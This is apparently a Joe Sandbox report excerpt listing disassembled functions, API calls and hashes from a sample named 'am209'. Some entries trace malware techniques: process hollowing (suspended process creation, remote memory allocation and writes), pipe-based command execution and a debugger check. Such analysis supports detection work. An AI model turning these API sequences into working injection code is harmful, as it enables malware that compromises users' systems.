                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                    • Opcode ID: 5bf193fee8e13bd601411da2ac5b93692fa8ed646d5c05a249e26dc7ca1745e2
                                                                                                                                                                                                                                                    • Instruction ID: fe5fdb205dd6fea4a554c8d6aea149137e535bd58eaf0a778a09472a2f6bd324
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5bf193fee8e13bd601411da2ac5b93692fa8ed646d5c05a249e26dc7ca1745e2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85014F72C00169AFCF51AFA88C019EE7FB6FF08310F14416AF924E6351E6718A65DBD5
                                                                                                                                                                                                                                                    Function 00699ED0 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 966 699ed0-699ed4 967 699ed8-699ee2 GetFileAttributesA 966->967 968 699ed6 966->968 969 699eeb-699eed 967->969 970 699ee4-699ee6 967->970 968->967 970->969 971 699ee8-699eea 970->971
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,006A20A2,?,?,?,?), ref: 00699ED9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                                                    • Opcode ID: 97544b8f3a7b1c0eb81ba10ece60f43f64ab241547fe920a83a0a111f4c46a88
                                                                                                                                                                                                                                                    • Instruction ID: ab115b33ed830ca4b05e38cb3583e6ceb00981ef8052b966e436cb137e436b86
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97544b8f3a7b1c0eb81ba10ece60f43f64ab241547fe920a83a0a111f4c46a88
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BC0123401070496EE2CCA7C55480B93317AD433957EC16CCD0324EAF5C7368847D720

                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                    Function 006B930D Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 006B9313
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 006B9321
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 006B9332
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 006B9343
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 006B9354
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 006B9365
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 006B9376
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 006B9387
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 006B9398
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 006B93A9
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 006B93BA
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 006B93CB
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 006B93DC
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 006B93ED
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 006B93FE
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 006B940F
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 006B9420
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 006B9431
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 006B9442
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 006B9453
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 006B9464
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 006B9475
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 006B9486
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 006B9497
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 006B94A8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 006B94B9
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 006B94CA
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 006B94DB
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 006B94EC
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 006B94FD
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 006B950E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 006B951F
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 006B9530
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 006B9541
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 006B9552
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 006B9563
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 006B9574
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 006B9585
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 006B9596
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 006B95A7
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 006B95B8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                    • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 667068680-295688737
                                                                                                                                                                                                                                                    • Opcode ID: f7e1a7264988d04558d23dafb135f886351fd8a6cebd62227679b6c6484be758
                                                                                                                                                                                                                                                    • Instruction ID: 13362861eb6987edda60f1ed94972f59d645f8531e5784562bf67945b31eb6d0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7e1a7264988d04558d23dafb135f886351fd8a6cebd62227679b6c6484be758
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A161F7729963E1AFCB005FB5AC9DA6A3BAFBA0A741315245AF101DB1A4DFF44180DF50
                                                                                                                                                                                                                                                    Function 00698070 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 121memoryprocessthreadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0069809D
                                                                                                                                                                                                                                                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 006980FB
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00698114
                                                                                                                                                                                                                                                    • GetThreadContext.KERNEL32(?,00000000), ref: 00698129
                                                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 00698149
                                                                                                                                                                                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0069818B
                                                                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 006981A8
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00698261
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
                                                                                                                                                                                                                                                    • String ID: $VUUU$invalid stoi argument
                                                                                                                                                                                                                                                    • API String ID: 3796053839-3954507777
                                                                                                                                                                                                                                                    • Opcode ID: f5778f03817f4990c605aa2b42d4fc1130ebf6ffa9b42f20b25b1b8e986b04fd
                                                                                                                                                                                                                                                    • Instruction ID: d2264d718a53ba3d1cc3814917ca288f6f99c6591d77ff55543bef1896ab1d47
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5778f03817f4990c605aa2b42d4fc1130ebf6ffa9b42f20b25b1b8e986b04fd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7417F71644341BFD7209F60DC46F9A7BEAFF89B01F400419B744EA2D0EBB0A954CB96
                                                                                                                                                                                                                                                    Function 006D29A7 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 006C6CF0: GetLastError.KERNEL32(?,?,?,006BE157,?,?,?,?,006BEFF2,?), ref: 006C6CF5
                                                                                                                                                                                                                                                      • Part of subcall function 006C6CF0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,006BE157,?,?,?,?,006BEFF2,?), ref: 006C6D93
                                                                                                                                                                                                                                                      • Part of subcall function 006C6CF0: _free.LIBCMT ref: 006C6D52
                                                                                                                                                                                                                                                      • Part of subcall function 006C6CF0: _free.LIBCMT ref: 006C6D88
                                                                                                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 006D2AB3
                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 006D2AFC
                                                                                                                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 006D2B0B
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 006D2B53
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 006D2B72
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                                    • String ID: an
                                                                                                                                                                                                                                                    • API String ID: 949163717-853377573
                                                                                                                                                                                                                                                    • Opcode ID: eabac877bf9d3277606b63ac580f7e63c7be983f6053eb1d795d5c59551a926e
                                                                                                                                                                                                                                                    • Instruction ID: 45919041b352feb308f3e680c755867fa3e8b146be3eb77faab9562c229a9663
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eabac877bf9d3277606b63ac580f7e63c7be983f6053eb1d795d5c59551a926e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39518071E00216AFDB20DFA5CC51AFA77BAEF28700F09442AF910EB351E7709940DB61
                                                                                                                                                                                                                                                    Function 006D27D2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,2000000B,006D2AF0,00000002,00000000,?,?,?,006D2AF0,?,00000000), ref: 006D286B
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,20001004,006D2AF0,00000002,00000000,?,?,?,006D2AF0,?,00000000), ref: 006D2894
                                                                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,006D2AF0,?,00000000), ref: 006D28A9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                    • Opcode ID: fef74a1d932aa952153ecd3755f0db235868b21d376bd4d319c9322436604ec8
                                                                                                                                                                                                                                                    • Instruction ID: 2a4980bc1f412e12b2c769dd3250a4491b8ff68f9a5ac41184f2f4341b676d86
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fef74a1d932aa952153ecd3755f0db235868b21d376bd4d319c9322436604ec8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F21B632E00203AAD7358F55D960FE7B3A7AF70B54B568066E90ADB344E732DD45E350
                                                                                                                                                                                                                                                    Function 006993D0 Relevance: 6.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetVersionExW.KERNEL32(0000011C,495BF602,0000000F,00000000), ref: 0069944A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Version
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1889659487-0
                                                                                                                                                                                                                                                    • Opcode ID: 15d94ef83060202bba375650d2e8b42ee9f17644ddf33b9347c56e8180f73cc5
                                                                                                                                                                                                                                                    • Instruction ID: 1c39b2cb4c86a7a22c815c2cbf6daed3dfce01a44ca51fbd6c65f2b07c26100e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15d94ef83060202bba375650d2e8b42ee9f17644ddf33b9347c56e8180f73cc5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5761B5B0D042489BDF20AB6CCD867ED7B7AAB05314F54429DF80597782DB744AC49BE2
                                                                                                                                                                                                                                                    Function 006BA3C5 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006BA3D1
                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 006BA49D
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006BA4BD
                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 006BA4C7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                                                                                                    • Opcode ID: 2c2e3e55d7f53b83927714a69f0397bc3aba83bbcd7c66bbc42c7035b981bc35
                                                                                                                                                                                                                                                    • Instruction ID: 16ab0a6e6a3d9abf65fad8cc906b38f6362befc233a6c5720adbe82cd09083a8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c2e3e55d7f53b83927714a69f0397bc3aba83bbcd7c66bbc42c7035b981bc35
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 283107B5D41318DBDB20DFA4D989BCDBBF8AF08300F1041AAE509AB250EB709B85DF45
                                                                                                                                                                                                                                                    Function 006CEB9F Relevance: 3.1, APIs: 2, Instructions: 81timeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006CEBAF
                                                                                                                                                                                                                                                      • Part of subcall function 006C80D6: HeapFree.KERNEL32(00000000,00000000,?,006D107C,?,00000000,?,?,?,006D131F,?,00000007,?,?,006D17C4,?), ref: 006C80EC
                                                                                                                                                                                                                                                      • Part of subcall function 006C80D6: GetLastError.KERNEL32(?,?,006D107C,?,00000000,?,?,?,006D131F,?,00000007,?,?,006D17C4,?,?), ref: 006C80FE
                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32 ref: 006CEBC1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorFreeHeapInformationLastTimeZone_free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3107070095-0
                                                                                                                                                                                                                                                    • Opcode ID: 6278644841a7e8d8ac432379f9bc4c721e4bc35899ca8220e3a8c7d19369e54b
                                                                                                                                                                                                                                                    • Instruction ID: f0cc2ba2bf2f677084b95f94092a9c1e806f902284e8b982cbd0f8e2c7ebe3a5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6278644841a7e8d8ac432379f9bc4c721e4bc35899ca8220e3a8c7d19369e54b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A21D571900120EBCB156F65CC02BB97FB3FF05310B09905EE445AB2A1D7B29940CBA5
                                                                                                                                                                                                                                                    Function 00698280 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 257pipeprocessfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000080,?), ref: 0069832D
                                                                                                                                                                                                                                                    • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000), ref: 00698403
                                                                                                                                                                                                                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 00698415
                                                                                                                                                                                                                                                    • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00698459
                                                                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000044,?), ref: 00698481
                                                                                                                                                                                                                                                    • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 0069848F
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064), ref: 006984B8
                                                                                                                                                                                                                                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 006984DA
                                                                                                                                                                                                                                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 006984FE
                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,0000007F,00000000,00000000), ref: 00698525
                                                                                                                                                                                                                                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0069856A
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00698581
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00698589
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00698591
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00698599
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 006985A3
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Handle$ClosePipeWow64$NamedPeek$CreateRedirection$DisableErrorFileInformationLastObjectPathProcessReadRevertSingleTempWait
                                                                                                                                                                                                                                                    • String ID: D
                                                                                                                                                                                                                                                    • API String ID: 3215130363-2746444292
                                                                                                                                                                                                                                                    • Opcode ID: cb00780804439d6b8dc14167955b9a9da691ed5332be6472706e799ec7ba671b
                                                                                                                                                                                                                                                    • Instruction ID: 4b8d9b054e03be01ba8161bec7470f1dbd80f34e2bfbab4806ea642cb3ec800f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb00780804439d6b8dc14167955b9a9da691ed5332be6472706e799ec7ba671b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71A18F71940258AFEF60DF60CC45BDDB7BAAF05700F1041DAE608AB281DB75AE84CFA4
